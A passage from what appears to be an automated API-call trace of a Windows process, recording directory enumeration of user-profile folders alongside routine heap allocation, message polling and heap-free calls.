dwReserved1=0x657690, cFileName="..", cAlternateFileName="")) returned 1 [0072.938] FindNextFileW (in: hFindFile=0x6b88f8, lpFindFileData=0x61e7f0 | out: lpFindFileData=0x61e7f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6b98e0, dwReserved1=0x657690, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 1 [0072.938] PeekMessageW (in: lpMsg=0x61eda4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61eda4) returned 0 [0072.938] PeekMessageW (in: lpMsg=0x61eda4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61eda4) returned 0 [0072.938] PeekMessageW (in: lpMsg=0x61eda4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61eda4) returned 0 [0072.938] PeekMessageW (in: lpMsg=0x61eda4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61eda4) returned 0 [0072.938] PeekMessageW (in: lpMsg=0x61eda4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61eda4) returned 0 [0072.938] PeekMessageW (in: lpMsg=0x61eda4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61eda4) returned 0 [0072.938] PeekMessageW (in: lpMsg=0x61eda4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61eda4) returned 0 [0072.938] PeekMessageW (in: lpMsg=0x61eda4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61eda4) returned 0 [0072.938] PeekMessageW (in: lpMsg=0x61eda4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61eda4) returned 0 [0072.938] PeekMessageW (in: lpMsg=0x61eda4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61eda4) returned 0 [0072.939] PeekMessageW (in: lpMsg=0x61eda4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61eda4) returned 0 [0072.939] FindNextFileW (in: hFindFile=0x6b88f8, lpFindFileData=0x61e7d8 | out: lpFindFileData=0x61e7d8*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x307290f2, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x307290f2, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x307290f2, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x657690, cFileName="All Users", cAlternateFileName="ALLUSE~1")) returned 1 [0072.939] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ae68 [0072.939] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d950 [0072.939] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6908c0 [0072.939] PeekMessageW (in: lpMsg=0x61eda4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61eda4) returned 0 [0072.939] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6908c0 [0072.939] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20a) returned 0x6ba8e8 [0072.939] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6908d0 [0072.939] PeekMessageW (in: lpMsg=0x61eda4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61eda4) returned 0 [0072.939] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6908c0 [0072.939] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20a) returned 0x6ba8e8 [0072.939] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6908d0 [0072.939] PeekMessageW (in: lpMsg=0x61eda4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61eda4) returned 0 [0072.939] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6908c0 [0072.939] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6908d0 [0072.939] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f96a8 [0072.939] PeekMessageW (in: lpMsg=0x61eda4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61eda4) returned 0 [0072.939] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6908c0 [0072.939] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ae68 [0072.939] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6908d0 [0072.939] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f96a8 [0072.940] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76af88 [0072.940] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6908f0 [0072.940] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d950 [0072.940] PeekMessageW (in: lpMsg=0x61eda4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61eda4) returned 0 [0072.940] PeekMessageW (in: lpMsg=0x61eda4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61eda4) returned 0 [0072.940] PeekMessageW (in: lpMsg=0x61eda4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61eda4) returned 0 [0072.940] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6908f0 [0072.940] PeekMessageW (in: lpMsg=0x61eda4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61eda4) returned 0 [0072.940] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6908f0 [0072.940] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d950 [0072.940] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ae68 [0072.940] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6908c0 [0072.940] FindNextFileW (in: hFindFile=0x6b88f8, lpFindFileData=0x61e7d8 | out: lpFindFileData=0x61e7d8*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x62fa4a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x62fa4a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x10, dwReserved1=0x657690, cFileName="Default", cAlternateFileName="")) returned 1 [0072.940] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76af88 [0072.940] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ad30 [0072.940] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6908c0 [0072.940] PeekMessageW (in: lpMsg=0x61eda4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61eda4) returned 0 [0072.940] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6908c0 [0072.940] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20a) returned 0x6ba9d0 [0072.940] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6908f0 [0072.940] PeekMessageW (in: lpMsg=0x61eda4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61eda4) returned 0 [0072.940] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6908c0 [0072.940] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20a) returned 0x6ba9d0 [0072.940] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6908f0 [0072.941] PeekMessageW (in: lpMsg=0x61eda4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61eda4) returned 0 [0072.941] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6908c0 [0072.941] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6908f0 [0072.941] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f96a8 [0072.941] PeekMessageW (in: lpMsg=0x61eda4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61eda4) returned 0 [0072.941] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6908c0 [0072.941] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76af88 [0072.941] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6908f0 [0072.941] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f96a8 [0072.941] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ad30 [0072.941] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6908d0 [0072.941] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d950 [0072.941] PeekMessageW (in: lpMsg=0x61eda4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61eda4) returned 0 [0072.941] PeekMessageW (in: lpMsg=0x61eda4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61eda4) returned 0 [0072.941] PeekMessageW (in: lpMsg=0x61eda4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61eda4) returned 0 [0072.941] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6908d0 [0072.941] PeekMessageW (in: lpMsg=0x61eda4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61eda4) returned 0 [0072.941] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6908d0 [0072.941] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d950 [0072.941] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76af88 [0072.941] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6908c0 [0072.941] FindNextFileW (in: hFindFile=0x6b88f8, lpFindFileData=0x61e7d8 | out: lpFindFileData=0x61e7d8*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x307290f2, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x307290f2, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x307290f2, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x657690, cFileName="Default User", cAlternateFileName="DEFAUL~1")) returned 1 [0072.941] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ad30 [0072.941] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d928 [0072.941] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6908c0 [0072.942] PeekMessageW (in: lpMsg=0x61eda4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61eda4) returned 0 [0072.942] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6908c0 [0072.942] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20a) returned 0x6ba9d0 [0072.942] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6908d0 [0072.942] PeekMessageW (in: lpMsg=0x61eda4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61eda4) returned 0 [0072.942] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6908c0 [0072.942] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20a) returned 0x6ba9d0 [0072.942] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6908d0 [0072.942] PeekMessageW (in: lpMsg=0x61eda4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61eda4) returned 0 [0072.942] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6908c0 [0072.942] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6908d0 [0072.942] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f96a8 [0072.942] PeekMessageW (in: lpMsg=0x61eda4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61eda4) returned 0 [0072.942] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6908c0 [0072.942] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ad30 [0072.942] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6908d0 [0072.942] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f96a8 [0072.942] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76af88 [0072.942] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6908f0 [0072.942] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d928 [0072.942] PeekMessageW (in: lpMsg=0x61eda4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61eda4) returned 0 [0072.942] PeekMessageW (in: lpMsg=0x61eda4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61eda4) returned 0 [0072.942] PeekMessageW (in: lpMsg=0x61eda4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61eda4) returned 0 [0072.942] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6908f0 [0072.942] PeekMessageW (in: lpMsg=0x61eda4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61eda4) returned 0 [0072.943] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6908f0 [0072.943] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d928 [0072.943] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ad30 [0072.943] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6908c0 [0072.943] FindNextFileW (in: hFindFile=0x6b88f8, lpFindFileData=0x61e7d8 | out: lpFindFileData=0x61e7d8*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x286e4016, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x286e4016, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x28a4ffbc, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0xae, dwReserved0=0x10, dwReserved1=0x657690, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0072.943] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76af88 [0072.943] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d950 [0072.943] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6908c0 [0072.943] PeekMessageW (in: lpMsg=0x61eda4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61eda4) returned 0 [0072.943] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6908c0 [0072.943] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20a) returned 0x6ba9d0 [0072.943] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6908f0 [0072.943] PeekMessageW (in: lpMsg=0x61eda4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61eda4) returned 0 [0072.943] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6908c0 [0072.943] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20a) returned 0x6ba9d0 [0072.943] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6908f0 [0072.943] PeekMessageW (in: lpMsg=0x61eda4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61eda4) returned 0 [0072.943] PeekMessageW (in: lpMsg=0x61eda4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61eda4) returned 0 [0072.943] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6908c0 [0072.943] PeekMessageW (in: lpMsg=0x61eda4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61eda4) returned 0 [0072.943] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6908c0 [0072.943] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d950 [0072.943] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76af88 [0072.943] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6908f0 [0072.943] FindNextFileW (in: hFindFile=0x6b88f8, lpFindFileData=0x61e7d8 | out: lpFindFileData=0x61e7d8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdac04c8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x917fa2ee, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x917fa2ee, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x61ecd0, dwReserved1=0x657690, cFileName="Public", cAlternateFileName="")) returned 1 [0072.944] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ad30 [0072.944] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ae68 [0072.944] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6908f0 [0072.944] PeekMessageW (in: lpMsg=0x61eda4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61eda4) returned 0 [0072.944] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6908f0 [0072.944] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20a) returned 0x6ba9d0 [0072.944] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6908c0 [0072.944] PeekMessageW (in: lpMsg=0x61eda4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61eda4) returned 0 [0072.944] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6908f0 [0072.944] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20a) returned 0x6ba9d0 [0072.944] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6908c0 [0072.944] PeekMessageW (in: lpMsg=0x61eda4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61eda4) returned 0 [0072.944] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6908f0 [0072.944] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6908c0 [0072.944] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f96a8 [0072.944] PeekMessageW (in: lpMsg=0x61eda4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61eda4) returned 0 [0072.944] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6908f0 [0072.944] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ad30 [0072.944] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6908c0 [0072.944] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f96a8 [0072.944] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ae68 [0072.944] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6908d0 [0072.944] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d950 [0072.944] PeekMessageW (in: lpMsg=0x61eda4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61eda4) returned 0 [0072.944] PeekMessageW (in: lpMsg=0x61eda4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61eda4) returned 0 [0072.944] PeekMessageW (in: lpMsg=0x61eda4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61eda4) returned 0 [0072.944] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6908d0 [0072.945] PeekMessageW (in: lpMsg=0x61eda4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61eda4) returned 0 [0072.945] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6908d0 [0072.945] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d950 [0072.945] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ad30 [0072.945] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6908f0 [0072.945] FindNextFileW (in: hFindFile=0x6b88f8, lpFindFileData=0x61e7d8 | out: lpFindFileData=0x61e7d8*(dwFileAttributes=0xac00a7, ftCreationTime.dwLowDateTime=0xc2390, ftCreationTime.dwHighDateTime=0x63f910, ftLastAccessTime.dwLowDateTime=0x77cb1ecd, ftLastAccessTime.dwHighDateTime=0x1317ae, ftLastWriteTime.dwLowDateTime=0xfffffffe, ftLastWriteTime.dwHighDateTime=0xb200a8, nFileSizeHigh=0xc2390, nFileSizeLow=0x76afa0, dwReserved0=0x10, dwReserved1=0x657690, cFileName="Pu\x08", cAlternateFileName="?haဓ\x03\x10")) returned 0 [0072.945] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ae68 [0072.945] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76af88 [0072.945] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6908f0 [0072.945] PeekMessageW (in: lpMsg=0x61eda4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61eda4) returned 0 [0072.945] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6908f0 [0072.945] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20a) returned 0x6baba8 [0072.945] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6908d0 [0072.945] PeekMessageW (in: lpMsg=0x61eda4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61eda4) returned 0 [0072.945] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d950 [0072.945] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76af88 [0072.945] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6908f0 [0072.945] FindClose (in: hFindFile=0x6b88f8 | out: hFindFile=0x6b88f8) returned 1 [0072.945] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76af28 | out: hHeap=0x650000) returned 1 [0072.945] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6908b0 | out: hHeap=0x650000) returned 1 [0072.945] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d978 | out: hHeap=0x650000) returned 1 [0072.945] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76af88 | out: hHeap=0x650000) returned 1 [0072.945] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d950 | out: hHeap=0x650000) returned 1 [0072.946] PeekMessageW (in: lpMsg=0x61eda4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61eda4) returned 0 [0072.946] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x74b420 | out: hHeap=0x650000) returned 1 [0072.946] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b048 | out: hHeap=0x650000) returned 1 [0072.946] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a8c8 | out: hHeap=0x650000) returned 1 [0072.946] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906d0 | out: hHeap=0x650000) returned 1 [0072.946] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d8b0 | out: hHeap=0x650000) returned 1 [0072.946] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ae80 | out: hHeap=0x650000) returned 1 [0072.946] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76afd0 | out: hHeap=0x650000) returned 1 [0072.946] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906c0 | out: hHeap=0x650000) returned 1 [0072.946] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d888 | out: hHeap=0x650000) returned 1 [0072.946] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ac88 | out: hHeap=0x650000) returned 1 [0072.946] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b030 | out: hHeap=0x650000) returned 1 [0072.946] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a8b0 | out: hHeap=0x650000) returned 1 [0072.946] HeapFree (in: 